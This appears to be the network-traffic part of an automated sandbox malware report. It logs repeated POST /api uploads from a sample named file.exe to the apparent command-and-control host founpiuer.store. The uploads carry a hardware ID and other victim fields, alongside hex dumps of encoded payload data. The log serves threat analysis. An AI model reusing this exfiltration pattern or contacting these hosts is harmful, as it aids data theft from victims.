                                                                                                                                                                                                                            Data Ascii: Qmu0A4PI3th/cWSDblSDc9yS0ru/axRHxphWkLE5vH/HTrCxA8j+GC7Flye/AJLX3JK2HsvL1McmyOZkhV0NLkJrVGNiuZ44DwGFox4UE3NMUuJLP49QcxaJ0pEx36ze84uVwzeYCol7ocRHu3BzA8yiYluvKxRXdhiGZNV9vH7jy7Sj4ykOaL9x9ON+5CdHOOIDn0pPVndmyXK35e1c7jIvNUfSDf4YK6Qwg16kgmPNwiL6bwsE98bItpTlrWz
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 55 66 53 44 66 34 59 4b 36 51 77 67 33 35 6b 63 2f 4e 38 6f 6e 4a 72 6e 35 74 6b 35 79 59 6f 4a 6a 52 56 72 66 7a 4f 30 35 74 55 73 30 50 5a 72 30 69 2f 4d 58 52 48 75 68 42 7a 4d 6c 6a 6e 39 68 6d 2f 75 6a 53 6c 35 73 6c 47 41 4c 51 70 58 5a 70 44 4f 2f 43 32 74 35 6d 4f 4f 47 38 52 31 41 4f 2f 31 43 4f 6a 62 50 4c 53 65 31 38 62 6c 50 63 57 36 46 62 30 64 64 33 4d 66 32 4a 72 5a 4e 49 54 50 66 71 4d 37 39 41 77 68 6a 72 33 45 6b 4b 74 38 78 59 34 48 2f 75 30 64 32 65 63 56 32 42 55 53 62 78 2b 68 30 36 77 73 34 4f 5a 50 68 68 76 77 66 51 44 54 67 54 69 59 38 77 69 6b 7a 73 2f 79 38 52 33 35 6a 6a 47 52 4d 55 4e 44 4b 36 54 43 30 53 6e 4e 33 33 2b 47 57 75 6b 4d 49 44 66 39 4b 4f 42 50 46 4b 79 6a 30 34 2f 74 51 4d 57 69 4a 4b 52 4d 64 33 38 7a 73 50 72
                                                                                                                                                                                                                            Data Ascii: UfSDf4YK6Qwg35kc/N8onJrn5tk5yYoJjRVrfzO05tUs0PZr0i/MXRHuhBzMljn9hm/ujSl5slGALQpXZpDO/C2t5mOOG8R1AO/1COjbPLSe18blPcW6Fb0dd3Mf2JrZNITPfqM79Awhjr3EkKt8xY4H/u0d2ecV2BUSbx+h06ws4OZPhhvwfQDTgTiY8wikzs/y8R35jjGRMUNDK6TC0SnN33+GWukMIDf9KOBPFKyj04/tQMWiJKRMd38zsPr
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC188INData Raw: 6d 2b 47 4b 2f 42 51 49 64 61 39 41 4c 48 32 57 5a 77 36 54 79 66 64 6f 53 79 2b 61 4a 31 49 64 33 4d 79 6b 62 50 4e 48 4d 44 57 58 36 59 6a 7a 46 30 49 79 35 45 73 2f 4f 63 49 75 4a 4c 4c 39 73 45 78 77 61 34 6c 6a 54 56 37 59 7a 2b 73 37 75 77 74 39 65 5a 6a 2b 7a 71 4a 62 62 53 7a 6b 53 54 4a 39 30 57 6b 34 39 50 75 35 43 53 6b 76 69 57 42 4e 57 39 37 4d 35 54 4b 37 54 6a 73 39 6e 75 43 49 2b 52 52 4d 50 75 35 49 4d 44 48 41 4c 53 43 31 38 4c 35 47 65 6d 72 46 4a 77 74 61 77 34 43 38 64 49 4a 49 4a 53 36 50 36 73 37 6c 56 56 46 37 36 45 74 30 5a 59 0d 0a
                                                                                                                                                                                                                            Data Ascii: m+GK/BQIda9ALH2WZw6TyfdoSy+aJ1Id3MykbPNHMDWX6YjzF0Iy5Es/OcIuJLL9sExwa4ljTV7Yz+s7uwt9eZj+zqJbbSzkSTJ90Wk49Pu5CSkviWBNW97M5TK7Tjs9nuCI+RRMPu5IMDHALSC18L5GemrFJwtaw4C8dIJIJS6P6s7lVVF76Et0ZY
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 33 37 61 32 0d 0a 34 6d 4d 37 37 32 75 30 78 2b 61 6f 5a 6d 54 46 44 64 7a 4f 34 39 75 30 30 38 4d 49 33 6c 67 76 51 63 52 6a 66 68 53 6a 34 2b 77 32 64 76 39 50 75 74 43 53 6b 76 71 57 35 47 63 39 44 4d 34 33 53 73 42 53 70 35 6d 4f 72 4f 6f 6c 74 45 4d 65 4e 4f 4e 44 54 4c 4c 79 71 39 2b 62 52 43 64 47 79 44 5a 45 52 55 79 63 72 6e 4f 72 42 48 50 7a 2b 65 35 5a 7a 79 45 67 68 31 72 30 41 73 66 5a 5a 6e 41 4c 72 78 6f 55 35 68 4c 35 6f 6e 55 68 33 63 7a 4b 52 73 38 30 67 79 4e 70 7a 6e 67 2f 77 53 51 44 76 70 51 6a 73 77 77 43 41 6d 74 50 47 37 52 6e 64 6e 69 47 56 41 55 39 4c 47 35 44 57 35 43 33 31 35 6d 50 37 4f 6f 6c 74 34 4f 4f 39 48 4c 33 33 52 61 54 6a 30 2b 37 6b 4a 4b 53 2b 58 59 30 4a 64 32 4d 2f 6a 4d 4c 68 48 4e 6a 79 51 35 59 66 2f 45 6b 59
                                                                                                                                                                                                                            Data Ascii: 37a24mM772u0x+aoZmTFDdzO49u008MI3lgvQcRjfhSj4+w2dv9PutCSkvqW5Gc9DM43SsBSp5mOrOoltEMeNONDTLLyq9+bRCdGyDZERUycrnOrBHPz+e5ZzyEgh1r0AsfZZnALrxoU5hL5onUh3czKRs80gyNpzng/wSQDvpQjswwCAmtPG7RndniGVAU9LG5DW5C315mP7Oolt4OO9HL33RaTj0+7kJKS+XY0Jd2M/jMLhHNjyQ5Yf/EkY
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 48 32 57 5a 79 43 34 38 37 5a 47 63 6d 79 45 59 31 6c 50 31 38 6e 73 4d 62 39 41 50 54 2b 4e 34 49 48 7a 47 45 73 79 36 45 38 34 4e 38 30 67 59 66 71 38 73 6c 45 78 4e 38 56 4b 58 45 33 57 67 50 74 36 71 67 73 30 4e 64 2b 2b 7a 76 49 57 51 44 48 72 51 44 6b 36 79 43 34 7a 76 66 6d 37 53 58 56 6b 69 6d 39 50 58 74 76 53 34 6a 43 37 53 44 34 30 6b 65 57 4b 75 6c 55 49 50 50 63 48 62 48 33 38 4b 69 2b 76 38 37 4a 59 65 79 2b 61 4a 31 49 64 33 4d 79 6b 62 50 4e 50 50 53 75 55 35 34 58 78 46 55 38 30 36 6b 30 30 4d 73 6f 6b 4c 37 2f 39 74 6b 46 38 59 6f 74 6a 51 6c 54 63 7a 4f 41 7a 38 77 56 7a 50 6f 65 6d 31 72 6f 77 61 52 62 44 51 43 35 39 30 57 6b 34 39 50 75 35 43 53 6b 76 69 57 42 48 56 39 44 48 37 6a 71 36 52 54 67 72 6a 65 57 4b 2b 52 4a 4c 50 4f 5a 4a
                                                                                                                                                                                                                            Data Ascii: H2WZyC487ZGcmyEY1lP18nsMb9APT+N4IHzGEsy6E84N80gYfq8slExN8VKXE3WgPt6qgs0Nd++zvIWQDHrQDk6yC4zvfm7SXVkim9PXtvS4jC7SD40keWKulUIPPcHbH38Ki+v87JYey+aJ1Id3MykbPNPPSuU54XxFU806k00MsokL7/9tkF8YotjQlTczOAz8wVzPoem1rowaRbDQC590Wk49Pu5CSkviWBHV9DH7jq6RTgrjeWK+RJLPOZJ
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 64 76 39 50 75 74 43 53 6b 76 71 47 56 4d 64 4e 7a 62 70 43 76 39 55 6e 4d 2b 6b 36 62 57 75 68 70 44 4d 65 42 4b 4e 7a 76 4e 4c 43 53 2b 2f 62 4a 42 66 48 32 47 5a 6b 52 5a 32 38 2f 69 4d 72 4a 45 4e 54 36 57 35 34 62 39 57 77 5a 37 36 46 39 30 5a 59 34 4a 4a 72 66 34 39 56 59 2f 64 73 56 75 52 78 32 44 67 4f 51 2b 75 55 45 39 4f 5a 6a 30 69 50 4d 62 53 79 6e 73 51 54 77 37 77 69 73 73 76 50 57 31 54 48 70 69 6a 6d 52 4e 58 64 44 42 70 48 72 7a 54 43 74 35 78 36 61 2f 39 78 56 4d 4e 65 78 58 4d 33 33 52 61 54 6a 30 2b 37 6b 4a 4b 53 2b 4b 59 46 6c 61 33 73 6a 74 4e 4c 31 43 4f 6a 36 62 35 59 2f 2b 46 30 63 79 37 45 38 31 4e 63 45 6b 49 62 2f 30 76 30 68 2f 61 73 55 6e 43 31 72 44 67 4c 78 30 6e 45 67 32 4d 70 36 6b 71 66 77 63 52 48 76 77 43 53 31 39 79
                                                                                                                                                                                                                            Data Ascii: dv9PutCSkvqGVMdNzbpCv9UnM+k6bWuhpDMeBKNzvNLCS+/bJBfH2GZkRZ28/iMrJENT6W54b9WwZ76F90ZY4JJrf49VY/dsVuRx2DgOQ+uUE9OZj0iPMbSynsQTw7wissvPW1THpijmRNXdDBpHrzTCt5x6a/9xVMNexXM33RaTj0+7kJKS+KYFla3sjtNL1COj6b5Y/+F0cy7E81NcEkIb/0v0h/asUnC1rDgLx0nEg2Mp6kqfwcRHvwCS19y
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 79 73 6c 39 67 49 71 4a 7a 52 6c 76 4d 30 61 52 36 38 30 31 7a 59 63 2b 6f 7a 76 34 4b 43 47 4f 2f 46 57 39 6f 6e 58 42 78 35 75 50 37 55 44 46 35 78 54 45 5a 45 35 76 53 70 47 7a 7a 44 44 41 72 6a 65 43 4e 37 42 67 50 42 64 46 70 4d 7a 76 4c 49 44 48 32 30 72 35 64 64 69 2f 4c 4b 55 51 64 67 2f 6d 6b 66 50 4e 30 66 58 6d 48 70 74 61 36 4c 6b 73 31 34 55 41 69 4c 49 4d 4a 4a 72 4c 35 73 6c 6b 7a 51 59 35 39 54 42 32 56 67 4f 4a 30 36 78 74 39 65 5a 76 33 7a 71 4a 4c 47 6d 43 36 46 47 4e 74 6e 44 68 76 72 62 79 6a 43 53 6b 39 79 79 6c 5a 48 59 4f 41 6f 7a 65 68 57 54 55 36 69 65 58 4a 78 43 56 4c 4c 65 4a 49 50 7a 7a 77 47 51 2b 35 2f 62 5a 48 4d 31 36 54 5a 46 74 65 33 73 66 61 43 72 31 4d 4a 7a 36 52 34 49 36 36 56 51 67 30 72 78 38 4e 66 59 5a 6e 48 76
                                                                                                                                                                                                                            Data Ascii: ysl9gIqJzRlvM0aR6801zYc+ozv4KCGO/FW9onXBx5uP7UDF5xTEZE5vSpGzzDDArjeCN7BgPBdFpMzvLIDH20r5ddi/LKUQdg/mkfPN0fXmHpta6Lks14UAiLIMJJrL5slkzQY59TB2VgOJ06xt9eZv3zqJLGmC6FGNtnDhvrbyjCSk9yylZHYOAozehWTU6ieXJxCVLLeJIPzzwGQ+5/bZHM16TZFte3sfaCr1MJz6R4I66VQg0rx8NfYZnHv
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC1369INData Raw: 4b 6a 72 57 50 68 73 50 78 49 37 39 64 4b 55 4c 61 32 76 52 70 70 79 36 51 77 68 38 37 46 55 6d 4f 38 30 78 49 76 50 43 69 32 35 2f 61 49 52 2f 57 31 44 58 34 65 63 6c 75 58 55 4e 4c 4a 7a 6f 67 50 30 4e 57 58 75 68 42 7a 74 39 6c 68 35 68 2f 4c 79 4b 42 7a 46 33 78 54 45 4c 61 4e 6a 4f 36 6a 4f 6c 57 6e 34 65 6b 65 47 50 37 41 74 46 4e 38 35 45 4a 54 65 4f 61 57 47 79 76 4f 30 62 50 79 2b 42 65 41 73 46 69 35 4b 2f 59 65 41 63 59 32 75 41 71 4a 65 36 44 51 68 6a 76 51 6c 30 4c 34 35 2f 59 66 50 2f 70 31 74 33 62 4a 4e 71 44 47 50 6c 35 66 4d 33 6f 30 30 77 42 36 48 4e 67 76 77 63 55 6a 7a 70 59 52 52 39 67 47 63 75 39 4b 53 4d 43 54 6b 76 75 69 63 4c 52 5a 75 59 70 41 47 77 52 54 30 2b 69 66 66 44 33 77 78 4c 4b 2b 6c 45 64 48 4f 4f 49 57 48 73 72 50 73
                                                                                                                                                                                                                            Data Ascii: KjrWPhsPxI79dKULa2vRppy6Qwh87FUmO80xIvPCi25/aIR/W1DX4ecluXUNLJzogP0NWXuhBzt9lh5h/LyKBzF3xTELaNjO6jOlWn4ekeGP7AtFN85EJTeOaWGyvO0bPy+BeAsFi5K/YeAcY2uAqJe6DQhjvQl0L45/YfP/p1t3bJNqDGPl5fM3o00wB6HNgvwcUjzpYRR9gGcu9KSMCTkvuicLRZuYpAGwRT0+iffD3wxLK+lEdHOOIWHsrPs


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            2192.168.2.549706104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 12840
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:39:00 UTC12840OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E23F031F35789910559D4B63B93BE3C2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                            2024-11-06 13:39:01 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:01 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=1iofq8qpkss40n2nv8gk1blph3; expires=Sun, 02-Mar-2025 07:25:40 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oHEzTpq058aqCHshx%2FhBv8rGeEY%2FDDC9mNrKUlGaAIaXK%2Fa2zjxDFnQoDYQUQRC5xeCQURO7QwzLBt353KHzt54MAcMWeTQSHDGfz1ztNoiEYH8xRQwINPeYMIUpbRrPB1A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57cbb0fcd6b0a-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1303&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13868&delivery_rate=2260733&cwnd=251&unsent_bytes=0&cid=9a5913392f27ba8d&ts=636&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:01 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.80
                                                                                                                                                                                                                            2024-11-06 13:39:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.549707104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:02 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 15082
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:39:02 UTC15082OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E23F031F35789910559D4B63B93BE3C2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                            2024-11-06 13:39:02 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:02 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=pq028q8e99712ojo48c4ko7nh4; expires=Sun, 02-Mar-2025 07:25:41 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJEwe7FjroymfaNnGFy49Wftc4gc8cqnn7W4lLvJ8VxSvHqTGMGHpwhETj1t7qcz2Y3NkztEBV89afzE6h4WnOSjOb%2Foe0t1D0lXkgWLOnHliqdI1s%2BKsqUlKXaXiVBBkAM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57cc3a9106c51-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1179&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16110&delivery_rate=2377668&cwnd=250&unsent_bytes=0&cid=921f0bfb3c9b65c2&ts=579&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:02 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.80
                                                                                                                                                                                                                            2024-11-06 13:39:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            4192.168.2.549708104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:03 UTC370OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 20572
                                                                                                                                                                                                                            Host: founpiuer.store
                                                                                                                                                                                                                            2024-11-06 13:39:03 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 32 33 46 30 33 31 46 33 35 37 38 39 39 31 30 35 35 39 44 34 42 36 33 42 39 33 42 45 33 43 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                                                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E23F031F35789910559D4B63B93BE3C2--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                                                                                                                                                                            2024-11-06 13:39:03 UTC5241OUTData Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                            Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
                                                                                                                                                                                                                            2024-11-06 13:39:05 UTC1013INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:05 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=06j79cdqh3ol5jqipvk7atdcri; expires=Sun, 02-Mar-2025 07:25:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TrBE%2FqIs1ImbptdfK%2BTUXq%2FIxKhXaTWN1wKahm5HW7lCpFDeRFOFNYbqxudWqbynR9xYPxWxFeVLHTzAeK3ibEVuG7quPaWjIAieGnJJued7cFuE5dzdHBD3xNWnGuJYF30%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                            CF-RAY: 8de57cce18662cba-DFW
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1578&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21622&delivery_rate=1843411&cwnd=32&unsent_bytes=0&cid=e67a704d7d8d5807&ts=2147&x=0"
                                                                                                                                                                                                                            2024-11-06 13:39:05 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 38 30 0d 0a
                                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.80
                                                                                                                                                                                                                            2024-11-06 13:39:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.549709104.21.5.1554435508C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:06 UTC369OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                                                                                                            Cookie: __cf_mw_byp=c77U7F.gPJAmjz5RNTSkMPHI.8x_tiIP5OX3.2Px_Jw-1730900338-0.0.1.1-/api
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Content-Length: 1256
                                                                                                                                                                                                                            Host: founpiuer.store
